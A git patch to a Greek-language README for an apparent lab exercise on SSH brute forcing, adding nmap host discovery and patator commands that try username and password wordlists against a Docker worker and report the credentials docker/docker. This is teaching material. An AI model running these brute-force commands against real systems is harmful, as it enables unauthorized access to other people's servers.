From 803ad8b3da0a333797ded697b75a0f9e261504d6 Mon Sep 17 00:00:00 2001 From: AndreasNefeli Date: Sun, 24 Jan 2021 13:44:58 +0000 Subject: [PATCH] Update '2. SSH Brute Force/README.md' --- 2. SSH Brute Force/README.md | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/2. SSH Brute Force/README.md b/2. SSH Brute Force/README.md index 603c636..7faee81 100644 --- a/2. SSH Brute Force/README.md +++ b/2. SSH Brute Force/README.md @@ -43,15 +43,19 @@ ________________________________________________________________________________ **worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')** -* Με την ακόλουθη εντολή εκτελείτεαι η επίθεση, όπου: +* Με την ακόλουθη εντολή εκτελείται η επίθεση, όπου: 1. password.txt είναι το αρχείο στο οποίο γίνεται ο έλεγχος για το σωστό κωδικό -2. +2. usernames.txt είναι το αρχείο στο οποίο γίνεται ο έλεγχος για το σωστό όνομα χρήστη +3. host: μεταβλητή που περιέχει την ip του επιτιθέμένου worker - **patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker** + **patator ssh_login host=$worker user=FILE0 password=FILE1 0=usernames.txt 1=passwords.txt** * Εάν δε θέλουμε να εμφανιστούν, όλες οι ανεπιτυχείς προσπάθειες της επίθεσης, αλλά μόνο ο σωστός κωδικός, πρέπει να συμπληρώσουμε **-x ignore:mesg='Authentication failed.'** και η προηγούμενη εντολή θα εκτελεστεί έτσι: - **patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker -x ignore:mesg='Authentication failed.'** + **patator ssh_login host=$worker user=FILE0 password=FILE1 0=usernames.txt 1=passwords.txt -x ignore:mesg='Authentication failed.'** + +Επειδή κάνουμε έλεγχο δύο παραγόντων (username και password), όλοι οι κωδικοί θα δοκιμαστούν για κάθε όνομα χρήστη. Το σωστό αποτέλεσμα, όπως είναι αναμενόμενο, είναι **user: docker και password: docker** + _____________________________________________________________________________________________